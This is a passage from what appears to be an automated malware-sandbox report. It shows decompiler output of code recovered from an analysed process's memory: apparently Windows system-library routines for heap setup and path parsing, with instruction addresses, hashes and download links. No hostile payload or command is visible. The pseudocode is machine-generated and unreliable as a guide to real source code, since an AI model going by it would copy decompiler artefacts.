															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0538F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0538F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0538FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0538FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0538F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0538F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05414CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0539D130(_t427, _t494, _t511);
				}
			}










































































                                      0x05415ba5
                                      0x05415baa
                                      0x05415baf
                                      0x05415bb4
                                      0x05415bb6
                                      0x05415bbc
                                      0x05415bbe
                                      0x05415bc4
                                      0x05415bcd
                                      0x05415bd3
                                      0x05415bd6
                                      0x05415bdc
                                      0x05415be0
                                      0x05415be3
                                      0x05415beb
                                      0x05415bf2
                                      0x05415bf8
                                      0x05415bfe
                                      0x05415c04
                                      0x05415c0e
                                      0x05415c18
                                      0x05415c1f
                                      0x05415c25
                                      0x05415c2a
                                      0x05415c2c
                                      0x05415c32
                                      0x05415c3a
                                      0x05415c3f
                                      0x05415c42
                                      0x05415c48
                                      0x05415c5b
                                      0x05415c5b
                                      0x05415c2c
                                      0x05415cb7
                                      0x05415cb9
                                      0x05415cbf
                                      0x05415cc2
                                      0x05415cca
                                      0x05415ccb
                                      0x05415ccb
                                      0x05415cd1
                                      0x05415cd7
                                      0x05415cda
                                      0x05415ce1
                                      0x05415ce4
                                      0x05415ce7
                                      0x05415ced
                                      0x05415cf3
                                      0x05415cf9
                                      0x05415cff
                                      0x05415d08
                                      0x05415d0a
                                      0x05415d0e
                                      0x05415d10
                                      0x00000000
                                      0x00000000
                                      0x05415d16
                                      0x05415d1a
                                      0x00000000
                                      0x00000000
                                      0x05415d20
                                      0x05415d22
                                      0x05415d25
                                      0x05415d2f
                                      0x05415d2f
                                      0x05415d33
                                      0x05415d3d
                                      0x05415d49
                                      0x05415d4b
                                      0x00000000
                                      0x00000000
                                      0x05415d5a
                                      0x05415d5d
                                      0x05415d60
                                      0x00000000
                                      0x00000000
                                      0x05415d66
                                      0x05415d69
                                      0x00000000
                                      0x00000000
                                      0x05415d6f
                                      0x05415d6f
                                      0x05415d73
                                      0x05415d79
                                      0x05415d7f
                                      0x05415d86
                                      0x05415d95
                                      0x05415d98
                                      0x05415dba
                                      0x05415dcb
                                      0x05415dce
                                      0x05415dd3
                                      0x05415dd6
                                      0x05415dd8
                                      0x05415de6
                                      0x05415dec
                                      0x05415dee
                                      0x05415df1
                                      0x05415df3
                                      0x0541635a
                                      0x0541635a
                                      0x00000000
                                      0x0541635a
                                      0x05415dfe
                                      0x05415e02
                                      0x05415e05
                                      0x05415e07
                                      0x05415e10
                                      0x05415e13
                                      0x05415e1b
                                      0x05415e1c
                                      0x05415e21
                                      0x05415e22
                                      0x05415e23
                                      0x05415e25
                                      0x05415e2a
                                      0x05415e2c
                                      0x05415e2e
                                      0x05415e36
                                      0x05415e39
                                      0x05415e42
                                      0x05415e47
                                      0x05415e4d
                                      0x05415e54
                                      0x05415e54
                                      0x05415e54
                                      0x05415e2e
                                      0x05415e5c
                                      0x05415e5f
                                      0x05415e62
                                      0x05415e64
                                      0x05415e6b
                                      0x05415e70
                                      0x05415e7a
                                      0x05415e7a
                                      0x05415e7a
                                      0x05415e6b
                                      0x05415e7e
                                      0x05415e7f
                                      0x05415e7f
                                      0x05415e81
                                      0x05415e87
                                      0x05415e8b
                                      0x05415e8c
                                      0x05415e8c
                                      0x05415e8c
                                      0x05415e9a
                                      0x05415e9c
                                      0x05415ea2
                                      0x05415ea6
                                      0x05415f50
                                      0x05415f50
                                      0x05415f57
                                      0x05415f66
                                      0x05415f66
                                      0x05415f66
                                      0x05415f68
                                      0x05415f6a
                                      0x054163d0
                                      0x00000000
                                      0x05415f70
                                      0x05415f70
                                      0x05415f91
                                      0x05415f9c
                                      0x05415f9e
                                      0x05415fa4
                                      0x05415fa6
                                      0x0541638c
                                      0x05416392
                                      0x054163a1
                                      0x054163a7
                                      0x054163af
                                      0x054163af
                                      0x054163bd
                                      0x054163d8
                                      0x00000000
                                      0x054163d8
                                      0x05415fac
                                      0x05415fb2
                                      0x05415fb4
                                      0x05415fbd
                                      0x05415fc6
                                      0x05415fce
                                      0x05415fd4
                                      0x05415fdc
                                      0x05415fec
                                      0x05415fed
                                      0x05415fee
                                      0x05415fef
                                      0x05415ff9
                                      0x05415ffa
                                      0x05415ffb
                                      0x05415ffc
                                      0x05416000
                                      0x05416004
                                      0x05416012
                                      0x05416012
                                      0x05416018
                                      0x05416019
                                      0x0541601a
                                      0x0541601b
                                      0x0541601c
                                      0x05416020
                                      0x05416059
                                      0x0541605c
                                      0x05416061
                                      0x05416061
                                      0x05416022
                                      0x05416022
                                      0x05416022
                                      0x05416025
                                      0x0541602a
                                      0x0541602b
                                      0x05416031
                                      0x05416037
                                      0x05416038
                                      0x0541603e
                                      0x05416048
                                      0x05416049
                                      0x0541604a
                                      0x0541604b
                                      0x0541604c
                                      0x0541604d
                                      0x05416053
                                      0x05416054
                                      0x05416054
                                      0x05416062
                                      0x05416065
                                      0x05416067
                                      0x0541606a
                                      0x05416070
                                      0x05416075
                                      0x05416076
                                      0x05416081
                                      0x05416087
                                      0x05416095
                                      0x05416099
                                      0x0541609e
                                      0x054160a4
                                      0x054160ae
                                      0x054160b0
                                      0x054160b3
                                      0x054160b6
                                      0x054160b8
                                      0x054160ba
                                      0x054160ba
                                      0x054160ba
                                      0x054160ba
                                      0x054160be
                                      0x054160c0
                                      0x054160c5
                                      0x054160c5
                                      0x054160c5
                                      0x054160c6
                                      0x054160cd
                                      0x05416114
                                      0x054160cf
                                      0x054160cf
                                      0x054160d4
                                      0x054160d5
                                      0x054160da
                                      0x054160db
                                      0x054160e1
                                      0x054160e2
                                      0x054160e8
                                      0x054160f8
                                      0x054160fd
                                      0x054160fe
                                      0x05416102
                                      0x05416104
                                      0x05416107
                                      0x05416109
                                      0x0541610b
                                      0x0541610b
                                      0x0541610b
                                      0x0541610b
                                      0x0541610f
                                      0x0541610f
                                      0x05416117
                                      0x0541611a
                                      0x0541611f
                                      0x05416125
                                      0x05416134
                                      0x05416139
                                      0x0541613f
                                      0x05416146
                                      0x05416148
                                      0x0541614b
                                      0x0541614d
                                      0x0541614f
                                      0x0541614f
                                      0x0541614f
                                      0x0541614f
                                      0x05416153
                                      0x05416159
                                      0x05416159
                                      0x0541615c
                                      0x05416163
                                      0x05416169
                                      0x0541616c
                                      0x05416172
                                      0x05416181
                                      0x05416186
                                      0x05416187
                                      0x0541618b
                                      0x05416191
                                      0x05416195
                                      0x054161a3
                                      0x054161bb
                                      0x054161c0
                                      0x054161c3
                                      0x054161cc
                                      0x054161d0
                                      0x054161dc
                                      0x054161de
                                      0x054161e1
                                      0x054161e4
                                      0x054161e6
                                      0x054161e8
                                      0x054161e8
                                      0x054161e8
                                      0x054161e8
                                      0x054161e6
                                      0x054161ec
                                      0x054161f3
                                      0x05416203
                                      0x05416209
                                      0x0541620a
                                      0x05416216
                                      0x0541621d
                                      0x05416227
                                      0x05416241
                                      0x05416246
                                      0x0541624c
                                      0x05416257
                                      0x05416259
                                      0x0541625c
                                      0x0541625e
                                      0x05416260
                                      0x05416260
                                      0x05416260
                                      0x05416260
                                      0x0541625e
                                      0x05416264
                                      0x05416267
                                      0x05416269
                                      0x05416315
                                      0x05416315
                                      0x0541631b
                                      0x0541631e
                                      0x05416324
                                      0x05416327
                                      0x0541632f
                                      0x05416330
                                      0x05416333
                                      0x0541633a
                                      0x0541633c
                                      0x05416335
                                      0x05416335
                                      0x05416335
                                      0x0541633f
                                      0x05416342
                                      0x0541634c
                                      0x05416352
                                      0x05416355
                                      0x05416355
                                      0x05416359
                                      0x00000000
                                      0x0541626f
                                      0x05416275
                                      0x05416275
                                      0x05416278
                                      0x0541627e
                                      0x0541627e
                                      0x05416281
                                      0x05416287
                                      0x0541628d
                                      0x05416298
                                      0x0541629c
                                      0x054162a2
                                      0x0541629e
                                      0x0541629e
                                      0x0541629e
                                      0x054162a7
                                      0x054162a7
                                      0x054162aa
                                      0x054162b0
                                      0x054162f0
                                      0x054162f0
                                      0x054162f2
                                      0x054162f8
                                      0x054162fd
                                      0x054162b2
                                      0x054162b2
                                      0x054162b2
                                      0x054162b5
                                      0x054162dd
                                      0x054162e2
                                      0x054162e5
                                      0x054162b7
                                      0x054162b8
                                      0x054162bb
                                      0x054162bd
                                      0x054162c0
                                      0x054162c4
                                      0x054162cd
                                      0x054162cd
                                      0x054162c0
                                      0x054162bb
                                      0x054162b5
                                      0x05416302
                                      0x05416303
                                      0x05416305
                                      0x05416305
                                      0x05416305
                                      0x0541630c
                                      0x0541630c
                                      0x00000000
                                      0x0541627e
                                      0x05416269
                                      0x05415eac
                                      0x05415ebb
                                      0x05415ebe
                                      0x05415ecb
                                      0x05415ecb
                                      0x05415ece
                                      0x05415ece
                                      0x05415ed4
                                      0x05415ed7
                                      0x05415ed9
                                      0x05415edb
                                      0x05415edb
                                      0x05415ee1
                                      0x05415ee1
                                      0x05415ee3
                                      0x05415f20
                                      0x05415f20
                                      0x05415ee5
                                      0x05415ee5
                                      0x05415ee5
                                      0x05415ee8
                                      0x05415f11
                                      0x05415f18
                                      0x05415eea
                                      0x05415eea
                                      0x05415eed
                                      0x05415ef2
                                      0x05415ef8
                                      0x05415efb
                                      0x05415f0a
                                      0x05415f0a
                                      0x05415eed
                                      0x05415ee8
                                      0x05415f22
                                      0x05415f28
                                      0x00000000
                                      0x00000000
                                      0x05415f30
                                      0x05415f31
                                      0x05415f37
                                      0x05415f3a
                                      0x05415f3d
                                      0x05415f44
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05415f46
                                      0x05415f48
                                      0x05415f4d
                                      0x00000000
                                      0x05415f4d
                                      0x05415dda
                                      0x05415ddf
                                      0x00000000
                                      0x05415ddf
                                      0x05415dd8
                                      0x05415da7
                                      0x05415da9
                                      0x05415dac
                                      0x05415dae
                                      0x00000000
                                      0x05415db4
                                      0x05415db4
                                      0x00000000
                                      0x05415db4
                                      0x05415dae
                                      0x05415d88
                                      0x05415d8d
                                      0x05416363
                                      0x05416369
                                      0x0541636a
                                      0x05416370
                                      0x05416372
                                      0x0541637a
                                      0x0541637b
                                      0x0541637d
                                      0x00000000
                                      0x00000000
                                      0x0541637f
                                      0x05416385
                                      0x00000000
                                      0x05416385
                                      0x05415d38
                                      0x05415d3b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05415d3b
                                      0x05415d27
                                      0x05415d29
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x05416360
                                      0x00000000
                                      0x05416360
                                      0x05415c10
                                      0x05415c10
                                      0x054163da
                                      0x054163e5
                                      0x054163e5

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22eac3b06aa237dd44abd087539d81ea5f6b8634947667a6e87e041b8d75edf9
                                      • Instruction ID: eb52c46918a6f17e40de2ae74aa2cf14bf76e419b7335de5308363f889104c73
                                      • Opcode Fuzzy Hash: 22eac3b06aa237dd44abd087539d81ea5f6b8634947667a6e87e041b8d75edf9
                                      • Instruction Fuzzy Hash: 0A423975A042298FDB24CF68C881BEAB7B1FF45304F1581EAD84DAB342E7749985CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05364120, Relevance: .4, Instructions: 444COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E05364120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x543d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0537F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E05366E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L05364620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E05366E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M053645F8))) {
												case 0:
													_v568 = 0x5321078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x53211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L05364620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0538F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0538F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E053452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0535EB70(1, 0x54379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0535AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
